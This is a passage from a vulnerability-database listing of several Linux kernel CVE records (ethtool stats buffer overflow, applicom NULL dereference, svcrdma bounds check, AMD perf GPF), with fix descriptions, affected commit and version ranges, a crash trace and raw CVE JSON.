ETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and
ETHTOOL_GSTATS for the values.
If the number of stats changes between these calls (e.g., due to device
reconfiguration), userspace's buffer allocation will be incorrect,
potentially leading to buffer overflow.
Drivers are generally expected to maintain stable stat counts, but some
drivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making
this scenario possible.
Some drivers try to handle this internally:
- bnad_get_ethtool_stats() returns early in case stats.n_stats is not
equal to the driver's stats count.
- micrel/ksz884x also makes sure not to write anything beyond
stats.n_stats and overflow the buffer.
However, both use stats.n_stats which is already assigned with the value
returned from get_sset_count(), hence won't solve the issue described
here.
Change ethtool_get_strings(), ethtool_get_stats(),
ethtool_get_phy_stats() to not return anything in case of a mismatch
between userspace's size and get_sset_size(), to prevent buffer
overflow.
The returned n_stats value will be equal to zero, to reflect that
nothing has been returned.
This could result in one of two cases when using upstream ethtool,
depending on when the size change is detected:
1. When detected in ethtool_get_strings():
# ethtool -S eth2
no stats available
2. When detected in get stats, all stats will be reported as zero.
Both cases are presumably transient, and a subsequent ethtool call
should succeed.
Other than the overflow avoidance, these two cases are very evident (no
output/cleared stats), which is arguably better than presenting
incorrect/shifted stats.
I also considered returning an error instead of a "silent" response, but
that seems more destructive towards userspace apps.
Notes:
- This patch does not claim to fix the inherent race, it only makes sure
that we do not overflow the userspace buffer, and makes for a more
predictable behavior.
- RTNL lock is held during each ioctl, the race window exists between
the separate ioctl calls when the lock is released.
- Userspace ethtool always fills stats.n_stats, but it is likely that
these stats ioctls are implemented in other userspace applications
which might not fill it. The added code checks that it's not zero,
to prevent any regressions.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 3df375a1e75483b7d973c3cc2e46aa374db8428b
(git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f9dc0f45d2cd0189ce666288a29d2cc32c2e44d5 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 4afcb985355210e1688560dc47e64b94dad35d71 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < ca9983bc3a1189bd72f9ae449d925a66b2616326 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 7bea09f60f2ad5d232e2db8f1c14e850fd3fd416 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 4066b5b546293f44cd6d0e84ece6e3ee7ff27093 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 7b07be1ff1cb6c49869910518650e8d0abc7d25f (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ethtool/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3df375a1e75483b7d973c3cc2e46aa374db8428b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f9dc0f45d2cd0189ce666288a29d2cc32c2e44d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4afcb985355210e1688560dc47e64b94dad35d71",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ca9983bc3a1189bd72f9ae449d925a66b2616326",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7bea09f60f2ad5d232e2db8f1c14e850fd3fd416",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4066b5b546293f44cd6d0e84ece6e3ee7ff27093",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7b07be1ff1cb6c49869910518650e8d0abc7d25f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ethtool/ioctl.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:07.130Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3df375a1e75483b7d973c3cc2e46aa374db8428b"
},
{
"url": "https://git.kernel.org/stable/c/f9dc0f45d2cd0189ce666288a29d2cc32c2e44d5"
},
{
"url": "https://git.kernel.org/stable/c/4afcb985355210e1688560dc47e64b94dad35d71"
},
{
"url": "https://git.kernel.org/stable/c/ca9983bc3a1189bd72f9ae449d925a66b2616326"
},
{
"url": "https://git.kernel.org/stable/c/7bea09f60f2ad5d232e2db8f1c14e850fd3fd416"
},
{
"url": "https://git.kernel.org/stable/c/4066b5b546293f44cd6d0e84ece6e3ee7ff27093"
},
{
"url": "https://git.kernel.org/stable/c/7b07be1ff1cb6c49869910518650e8d0abc7d25f"
}
],
"title": "ethtool: Avoid overflowing userspace buffer on stats query",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68795",
"datePublished": "2026-01-13T15:29:06.217Z",
"dateReserved": "2025-12-24T10:30:51.041Z",
"dateUpdated": "2026-01-19T12:19:07.130Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68797 (GCVE-0-2025-68797)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
char: applicom: fix NULL pointer dereference in ac_ioctl
Summary
In the Linux kernel, the following vulnerability has been resolved:
char: applicom: fix NULL pointer dereference in ac_ioctl
Discovered by Atuin - Automated Vulnerability Discovery Engine.
In ac_ioctl, the validation of IndexCard and the check for a valid
RamIO pointer are skipped when cmd is 6. However, the function
unconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the
end.
If cmd is 6, IndexCard may reference a board that does not exist
(where RamIO is NULL), leading to a NULL pointer dereference.
Fix this by skipping the readb access when cmd is 6, as this
command is a global information query and does not target a specific
board context.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 5a6240804fb7bbd4f5f6e706955248a6f4c1abbc
(git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d1b0452280029d05a98c75631131ee61c0b0d084 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 0b8b353e09888bccee405e0dd6feafb60360f478 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d285517429a75423789e6408653e57b6fdfc8e54 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 74883565c621eec6cd2e35fe6d27454cf2810c23 (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f83e3e9f89181b42f6076a115d767a7552c4a39e (git) Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 82d12088c297fa1cef670e1718b3d24f414c23f7 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/applicom.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5a6240804fb7bbd4f5f6e706955248a6f4c1abbc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d1b0452280029d05a98c75631131ee61c0b0d084",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0b8b353e09888bccee405e0dd6feafb60360f478",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d285517429a75423789e6408653e57b6fdfc8e54",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "74883565c621eec6cd2e35fe6d27454cf2810c23",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f83e3e9f89181b42f6076a115d767a7552c4a39e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "82d12088c297fa1cef670e1718b3d24f414c23f7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/applicom.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:09.470Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5a6240804fb7bbd4f5f6e706955248a6f4c1abbc"
},
{
"url": "https://git.kernel.org/stable/c/d1b0452280029d05a98c75631131ee61c0b0d084"
},
{
"url": "https://git.kernel.org/stable/c/0b8b353e09888bccee405e0dd6feafb60360f478"
},
{
"url": "https://git.kernel.org/stable/c/d285517429a75423789e6408653e57b6fdfc8e54"
},
{
"url": "https://git.kernel.org/stable/c/74883565c621eec6cd2e35fe6d27454cf2810c23"
},
{
"url": "https://git.kernel.org/stable/c/f83e3e9f89181b42f6076a115d767a7552c4a39e"
},
{
"url": "https://git.kernel.org/stable/c/82d12088c297fa1cef670e1718b3d24f414c23f7"
}
],
"title": "char: applicom: fix NULL pointer dereference in ac_ioctl",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68797",
"datePublished": "2026-01-13T15:29:07.575Z",
"dateReserved": "2025-12-24T10:30:51.042Z",
"dateUpdated": "2026-01-19T12:19:09.470Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71068 (GCVE-0-2025-71068)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
svcrdma: bound check rq_pages index in inline path
Summary
In the Linux kernel, the following vulnerability has been resolved:
svcrdma: bound check rq_pages index in inline path
svc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without
verifying rc_curpage stays within the allocated page array. Add guards
before the first use and after advancing to a new page.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9
(git)
Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < 7ba826aae1d43212f3baa53a2175ad949e21926e (git) Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < 5f140b525180c628db8fa6c897f138194a2de417 (git) Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < da1ccfc4c452541584a4eae89e337cfa21be6d5a (git) Affected: d7cc73972661be4a02a1b09f1d9b3283c6c05154 , < d1bea0ce35b6095544ee82bb54156fc62c067e58 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "7ba826aae1d43212f3baa53a2175ad949e21926e",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "5f140b525180c628db8fa6c897f138194a2de417",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "da1ccfc4c452541584a4eae89e337cfa21be6d5a",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
},
{
"lessThan": "d1bea0ce35b6095544ee82bb54156fc62c067e58",
"status": "affected",
"version": "d7cc73972661be4a02a1b09f1d9b3283c6c05154",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtrdma/svc_rdma_rw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.11"
},
{
"lessThan": "5.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "5.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: bound check rq_pages index in inline path\n\nsvc_rdma_copy_inline_range indexed rqstp-\u003erq_pages[rc_curpage] without\nverifying rc_curpage stays within the allocated page array. Add guards\nbefore the first use and after advancing to a new page."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:29.814Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9"
},
{
"url": "https://git.kernel.org/stable/c/7ba826aae1d43212f3baa53a2175ad949e21926e"
},
{
"url": "https://git.kernel.org/stable/c/5f140b525180c628db8fa6c897f138194a2de417"
},
{
"url": "https://git.kernel.org/stable/c/da1ccfc4c452541584a4eae89e337cfa21be6d5a"
},
{
"url": "https://git.kernel.org/stable/c/d1bea0ce35b6095544ee82bb54156fc62c067e58"
}
],
"title": "svcrdma: bound check rq_pages index in inline path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71068",
"datePublished": "2026-01-13T15:31:23.283Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-19T12:19:29.814Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68798 (GCVE-0-2025-68798)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
perf/x86/amd: Check event before enable to avoid GPF
Summary
In the Linux kernel, the following vulnerability has been resolved:
perf/x86/amd: Check event before enable to avoid GPF
On AMD machines cpuc->events[idx] can become NULL in a subtle race
condition with NMI->throttle->x86_pmu_stop().
Check event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.
This appears to be an AMD only issue.
Syzkaller reported a GPF in amd_pmu_enable_all.
INFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143
msecs
Oops: general protection fault, probably for non-canonical address
0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]
CPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk
RIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195
arch/x86/events/core.c:1430)
RSP: 0018:ffff888118009d60 EFLAGS: 00010012
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0
RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002
R13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601
FS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0
Call Trace:
<IRQ>
amd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))
x86_pmu_enable (arch/x86/events/core.c:1360)
event_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186
kernel/events/core.c:2346)
__perf_remove_from_context (kernel/events/core.c:2435)
event_function (kernel/events/core.c:259)
remote_function (kernel/events/core.c:92 (discriminator 1)
kernel/events/core.c:72 (discriminator 1))
__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27
./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64
kernel/smp.c:135 kernel/smp.c:540)
__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27
./include/linux/jump_label.h:207
./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)
sysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)
arch/x86/kernel/smp.c:266 (discriminator 47))
</IRQ>
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
ada543459cab7f653dcacdaba4011a8bb19c627c , < 49324a0c40f7e9bae1bd0362d23fc42232e14621
(git)
Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < 6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f (git) Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < e1028fb38b328084bc683a4efb001c95d3108573 (git) Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < 43c2e5c2acaae50e99d1c20a5a46e367c442fb3b (git) Affected: ada543459cab7f653dcacdaba4011a8bb19c627c , < 866cf36bfee4fba6a492d2dcc5133f857e3446b0 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/events/amd/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "49324a0c40f7e9bae1bd0362d23fc42232e14621",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "6e41d9ec8d7cc3f01b9ba785e05f0ebef8b3b37f",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "e1028fb38b328084bc683a4efb001c95d3108573",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "43c2e5c2acaae50e99d1c20a5a46e367c442fb3b",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
},
{
"lessThan": "866cf36bfee4fba6a492d2dcc5133f857e3446b0",
"status": "affected",
"version": "ada543459cab7f653dcacdaba4011a8bb19c627c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/events/amd/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.19"
},
{
"lessThan": "5.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
